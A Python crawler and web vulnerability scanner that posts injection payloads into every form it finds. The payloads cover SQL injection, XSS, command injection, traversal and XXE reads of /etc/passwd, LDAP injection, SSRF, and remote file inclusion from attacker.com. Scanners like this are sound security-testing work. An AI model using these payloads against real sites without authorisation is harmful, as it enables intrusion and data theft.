web_crawler_vulnerability_scanner.py
"""
Web Crawler and Vulnerability Scanner
Author: Rohit Ajariwal
License: MIT License
This tool crawls a website and scans for common web application vulnerabilities.
"""
import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin, urlparse
import threading
import logging
import re

# Set up logging
logging.basicConfig(filename='vulnerability_scanner.log', level=logging.INFO,
                    format='%(asctime)s - %(levelname)s - %(message)s')

class WebCrawler:
    def __init__(self, base_url):
        self.base_url = base_url
        self.visited_urls = set()
        self.urls_to_visit = [base_url]
        self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'}
        self.lock = threading.Lock()
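
    # Crawling model: a fixed pool of worker threads shares one URL list,
    # guarded by self.lock so no two threads dequeue the same URL.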
    def crawl(self):
        threads = []
        for _ in range(10):  # Adjust the number of threads as needed
            thread = threading.Thread(target=self.worker)
            thread.start()
            threads.append(thread)
        for thread in threads:
            thread.join()
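
    # Caveat: a worker exits once the shared list is momentarily empty, so on
    # slow pages some threads may finish before later links are queued.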
    def worker(self):
        while self.urls_to_visit:
            url = None  # Ensure url is bound even if another thread drained the list
            with self.lock:
                if self.urls_to_visit:
                    url = self.urls_to_visit.pop(0)
            if url and url not in self.visited_urls:
                self.visit_url(url)

    def visit_url(self, url):
        with self.lock:
            self.visited_urls.add(url)
        try:
            response = requests.get(url, headers=self.headers, timeout=10)
            if response.status_code == 200:
                response.encoding = response.apparent_encoding
                soup = BeautifulSoup(response.text, 'html.parser')
                self.extract_links(soup, url)
                self.scan_forms(soup, url)
        except requests.RequestException as e:
            logging.error(f"Failed to fetch {url}: {e}")

    def extract_links(self, soup, current_url):
        for link in soup.find_all('a', href=True):
            # urljoin leaves absolute URLs unchanged and resolves relative ones
            href = urljoin(current_url, link['href'])
            parsed_href = urlparse(href)
            # Stay on the target host; skip off-site links
            if parsed_href.netloc == urlparse(self.base_url).netloc:
                with self.lock:
                    if href not in self.visited_urls and href not in self.urls_to_visit:
                        self.urls_to_visit.append(href)

    def scan_forms(self, soup, url):
        forms = soup.find_all('form')
        for form in forms:
            form_details = self.get_form_details(form)
            self.test_vulnerabilities(form_details, url)

    def get_form_details(self, form):
        details = {}
        try:
            # Default the action to '' so urljoin falls back to the page URL
            action = form.attrs.get('action', '')
            method = form.attrs.get('method', 'get').lower()
            inputs = []
            for input_tag in form.find_all('input'):
                input_type = input_tag.attrs.get('type', 'text')
                input_name = input_tag.attrs.get('name')
                inputs.append({'type': input_type, 'name': input_name})
            details['action'] = action
            details['method'] = method
            details['inputs'] = inputs
        except Exception as e:
            logging.error(f"Error getting form details: {e}")
        return details
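
    # Each test submits the form with the payload placed in every text/search
    # input and neutral filler ('test') in the remaining named inputs.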
    def send_request(self, form_details, url, payload):
        data = {}
        for field in form_details.get('inputs', []):
            # Browsers never submit inputs that lack a name attribute
            if not field['name']:
                continue
            if field['type'] in ('text', 'search'):
                data[field['name']] = payload
            else:
                data[field['name']] = 'test'
        target = urljoin(url, form_details.get('action', ''))
        if form_details.get('method') == 'post':
            return requests.post(target, data=data, headers=self.headers, timeout=10)
        return requests.get(target, params=data, headers=self.headers, timeout=10)

    def test_vulnerabilities(self, form_details, url):
        self.test_sql_injection(form_details, url)
        self.test_xss(form_details, url)
        self.test_command_injection(form_details, url)
        self.test_file_inclusion(form_details, url)
        self.test_directory_traversal(form_details, url)
        self.test_html_injection(form_details, url)
        self.test_csrf(form_details, url)
        self.test_rfi(form_details, url)
        self.test_ldap_injection(form_details, url)
        self.test_xxe(form_details, url)
        self.test_ssrf(form_details, url)
        self.test_unvalidated_redirects(form_details, url)
        self.test_clickjacking(url)
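
    # The tests below are simple error- and reflection-based heuristics: a
    # match suggests a vulnerability, and a clean response does not prove
    # the form is safe.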
    def test_sql_injection(self, form_details, url):
        sql_payloads = ["' OR '1'='1", "' OR '1'='1' --", "' OR '1'='1' /*",
                        "' OR '1'='1' {0}", "' OR '1'='1' AND '1'='1"]
        error_patterns = ["you have an error in your sql syntax", "warning: mysql",
                          "unclosed quotation mark after the character string",
                          "quoted string not properly terminated"]
        for payload in sql_payloads:
            response = self.send_request(form_details, url, payload)
            for pattern in error_patterns:
                if re.search(pattern, response.text, re.IGNORECASE):
                    logging.info(f"SQL Injection vulnerability found at {url}")
                    print(f"SQL Injection vulnerability found at {url}")
                    return  # Report each form at most once

    def test_xss(self, form_details, url):
        xss_payloads = ["<script>alert('XSS')</script>", "<img src='x' onerror='alert(1)'>",
                        "<svg onload=alert('XSS')>", "<body onload=alert('XSS')>",
                        "<iframe src=javascript:alert('XSS')>"]
        for payload in xss_payloads:
            response = self.send_request(form_details, url, payload)
            if payload in response.text:
                logging.info(f"XSS vulnerability found at {url}")
                print(f"XSS vulnerability found at {url}")
                break

    def test_command_injection(self, form_details, url):
        cmd_payloads = ["|| ping -c 1 127.0.0.1 ||", "; ping -c 1 127.0.0.1", "& ping -c 1 127.0.0.1",
                        "&& ping -c 1 127.0.0.1", "| ping -c 1 127.0.0.1 |"]
        for payload in cmd_payloads:
            response = self.send_request(form_details, url, payload)
            # Assumes the command's stdout ("PING ...") is echoed in the response
            if "PING" in response.text:
                logging.info(f"Command Injection vulnerability found at {url}")
                print(f"Command Injection vulnerability found at {url}")
                break

    def test_file_inclusion(self, form_details, url):
        lfi_payloads = ["../../../../etc/passwd", "..\\..\\..\\..\\etc\\passwd"]
        for payload in lfi_payloads:
            response = self.send_request(form_details, url, payload)
            if "root:" in response.text:
                logging.info(f"Local File Inclusion vulnerability found at {url}")
                print(f"Local File Inclusion vulnerability found at {url}")
                break

    def test_directory_traversal(self, form_details, url):
        dt_payloads = ["../../../../etc/passwd", "..\\..\\..\\..\\etc\\passwd"]
        for payload in dt_payloads:
            response = self.send_request(form_details, url, payload)
            if "root:" in response.text:
                logging.info(f"Directory Traversal vulnerability found at {url}")
                print(f"Directory Traversal vulnerability found at {url}")
                break

    def test_html_injection(self, form_details, url):
        html_payloads = ["<b>Injected HTML</b>", "<iframe src='javascript:alert(1)'></iframe>"]
        for payload in html_payloads:
            response = self.send_request(form_details, url, payload)
            if payload in response.text:
                logging.info(f"HTML Injection vulnerability found at {url}")
                print(f"HTML Injection vulnerability found at {url}")
                break

    def test_csrf(self, form_details, url):
        # Reflection payloads cannot detect CSRF; instead, use the common
        # heuristic of flagging state-changing (POST) forms that lack a
        # hidden anti-CSRF token field
        if form_details.get('method') != 'post':
            return
        has_token = any(
            field['type'] == 'hidden' and field['name'] and
            re.search(r'csrf|token', field['name'], re.IGNORECASE)
            for field in form_details.get('inputs', [])
        )
        if not has_token:
            logging.info(f"Possible CSRF vulnerability found at {url}")
            print(f"Possible CSRF vulnerability found at {url}")

    def test_rfi(self, form_details, url):
        rfi_payloads = ["http://attacker.com/malicious.php", "http://attacker.com/malicious.txt"]
        for payload in rfi_payloads:
            response = self.send_request(form_details, url, payload)
            if "malicious" in response.text:
                logging.info(f"Remote File Inclusion vulnerability found at {url}")
                print(f"Remote File Inclusion vulnerability found at {url}")
                break

    def test_ldap_injection(self, form_details, url):
        ldap_payloads = ["*)(uid=*))(|(uid=*", "*)(|(cn=*))", "*)(&(objectClass=*))", "*(|(objectClass=*))"]
        for payload in ldap_payloads:
            response = self.send_request(form_details, url, payload)
            # Crude heuristic: LDAP error messages usually mention "ldap"
            if re.search("ldap", response.text, re.IGNORECASE):
                logging.info(f"LDAP Injection vulnerability found at {url}")
                print(f"LDAP Injection vulnerability found at {url}")
                break

    def test_xxe(self, form_details, url):
        xxe_payloads = ["<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///etc/passwd\"> ]><foo>&xxe;</foo>",
                        "<!DOCTYPE foo [ <!ENTITY xxe SYSTEM \"file:///c:/windows/win.ini\"> ]><foo>&xxe;</foo>"]
        for payload in xxe_payloads:
            response = self.send_request(form_details, url, payload)
            # /etc/passwd leaks contain "root:"; win.ini leaks contain "[fonts]"
            if "root:" in response.text or "[fonts]" in response.text:
                logging.info(f"XXE vulnerability found at {url}")
                print(f"XXE vulnerability found at {url}")
                break

    def test_ssrf(self, form_details, url):
        ssrf_payloads = ["http://127.0.0.1:80", "http://localhost:80"]
        for payload in ssrf_payloads:
            response = self.send_request(form_details, url, payload)
            if "localhost" in response.text:
                logging.info(f"SSRF vulnerability found at {url}")
                print(f"SSRF vulnerability found at {url}")
                break

    def test_unvalidated_redirects(self, form_details, url):
        ur_payloads = ["http://evil.com", "http://phishing.com"]
        for payload in ur_payloads:
            response = self.send_request(form_details, url, payload)
            # Flag if the payload is reflected or the request was redirected to it
            if payload in response.text or response.url.startswith(payload):
                logging.info(f"Unvalidated Redirects vulnerability found at {url}")
                print(f"Unvalidated Redirects vulnerability found at {url}")
                break

    def test_clickjacking(self, url):
        try:
            response = requests.get(url, headers=self.headers, timeout=10)
            # Framing is blocked by X-Frame-Options or a CSP frame-ancestors directive
            if ('X-Frame-Options' not in response.headers and
                    'frame-ancestors' not in response.headers.get('Content-Security-Policy', '')):
                logging.info(f"Clickjacking vulnerability found at {url}")
                print(f"Clickjacking vulnerability found at {url}")
        except requests.RequestException as e:
            logging.error(f"Failed to fetch {url}: {e}")

# Example usage
if __name__ == "__main__":
    base_url = 'https://example.com'
    crawler = WebCrawler(base_url)
    crawler.crawl()
    print(f"Visited URLs: {crawler.visited_urls}")